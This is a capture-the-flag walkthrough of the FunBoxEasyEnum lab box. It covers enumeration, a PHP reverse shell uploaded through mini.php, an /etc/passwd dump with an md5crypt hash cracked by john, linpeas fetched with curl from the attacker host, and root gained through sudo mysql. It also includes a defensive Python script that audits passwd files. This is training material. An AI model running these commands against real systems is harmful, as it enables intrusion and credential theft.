🐧FunBoxEasyEnum

IP : 192.168.234.132

Enumeration

Nmap:

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Apache default site at 192.168.234.132:80

gobuster dir -k -u http://192.168.234.132:80 -x txt,html,php -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

index.html (Status: 200) [Size: 10918]

/javascript (Status: 301) [Size: 323] [--> http://192.168.234.132/javascript/]

/mini.php (Status: 200) [Size: 3828]

/robots.txt (Status: 200) [Size: 21]

/phpmyadmin (Status: 301) [Size: 323] [--> http://192.168.234.132/phpmyadmin/]

Found a place to upload files at /mini.php

Uploaded PHP reverse shell.

Ran /phpshell.php

Shell

Was able to upload a php reverse shell to mini.php.

Got reverse shell.

Read /etc/passwd

$ cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin

systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin

syslog:x:102:106::/home/syslog:/usr/sbin/nologin

messagebus:x:103:107::/nonexistent:/usr/sbin/nologin

_apt:x:104:65534::/nonexistent:/usr/sbin/nologin

lxd:x:105:65534::/var/lib/lxd/:/bin/false

uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin

dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin

landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin

pollinate:x:109:1::/var/cache/pollinate:/bin/false

sshd:x:110:65534::/run/sshd:/usr/sbin/nologin

karla:x:1000:1000:karla:/home/karla:/bin/bash

mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false

harry:x:1001:1001:,,,:/home/harry:/bin/bash

sally:x:1002:1002:,,,:/home/sally:/bin/bash

goat:x:1003:1003:,,,:/home/goat:/bin/bash

oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash

lissy:x:1005:1005::/home/lissy:/bin/sh

Bypassed shell restrictions: python3 -c 'import pty;pty.spawn("/bin/bash")'

john hash.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"

Use the "--format=md5crypt-long" option to force loading these as that type instead

Using default input encoding: UTF-8

Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])

Will run 8 OpenMP threads

Press 'q' or Ctrl-C to abort, almost any other key for status

hiphop (oracle)

1g 0:00:00:00 DONE (2022-11-03 17:05) 50.00g/s 19200p/s 19200c/s 19200C/s Sequel!1..sabrina

Use the "--show" option to display all of the cracked passwords reliably

Session completed.
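
The oracle entry in the /etc/passwd dump above keeps its md5crypt hash in the world-readable file instead of `x`, which is what allowed the offline crack. As an added example (not part of the original writeup), this Python audit flags such entries; the sample lines, the `svcacct` and `guest` accounts and the hash value are constructed.

```python
from typing import List, NamedTuple

# crypt(5) hash prefixes mapped to (scheme name, considered weak today).
SCHEMES = {
    "$1$": ("md5crypt", True),
    "$5$": ("sha256crypt", False),
    "$6$": ("sha512crypt", False),
    "$y$": ("yescrypt", False),
}
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


class Finding(NamedTuple):
    user: str
    issue: str
    interactive: bool  # True when the account has a login shell


def audit_passwd(text: str) -> List[Finding]:
    """Flag passwd(5) entries whose password field is not shadowed."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # blank, comment or malformed line
        user, pw, shell = fields[0], fields[1], fields[6]
        if pw == "x" or pw.startswith(("*", "!")):
            continue  # hash lives in /etc/shadow, or password login is locked
        if pw == "":
            issue = "empty password field"
        else:
            name, weak = next(
                (v for k, v in SCHEMES.items() if pw.startswith(k)),
                ("unrecognised or legacy DES", True),
            )
            issue = f"{name} hash readable by every local user"
            if weak:
                issue += " (fast to brute-force)"
        findings.append(Finding(user, issue, shell not in NON_LOGIN_SHELLS))
    return findings


# Constructed sample modelled on the dump above; the hash is a placeholder.
SAMPLE = r"""root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
svcacct:$1$PLACEHLD$AAAAAAAAAAAAAAAAAAAAAA:1004:1004:,,,:/home/svcacct:/bin/bash
guest::1006:1006::/home/guest:/bin/sh
"""

if __name__ == "__main__":
    for f in audit_passwd(SAMPLE):
        print(f"{f.user}: {f.issue} (login shell: {f.interactive})")
```

On a real host, pass the contents of /etc/passwd to `audit_passwd`; any finding with a login shell should be moved to /etc/shadow (for example with `pwconv`) and the password rotated.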

su oracle - to switch users

Uploaded linpeas

curl http://192.168.49.234:8000/linpeas.sh -o linpeas.sh

Found local.txt at /var/www

cat local.txt

Redacted, get your own flag!

Had to get a hint here.... Boxes made where you are expected to guess user's passwords are stupid.

Found password for goat was goat.

sudo -l

User has sudo perms for mysql

Root

https://gtfobins.github.io/gtfobins/mysql/#sudo

sudo mysql -e '\! /bin/sh'

Got Root Woot
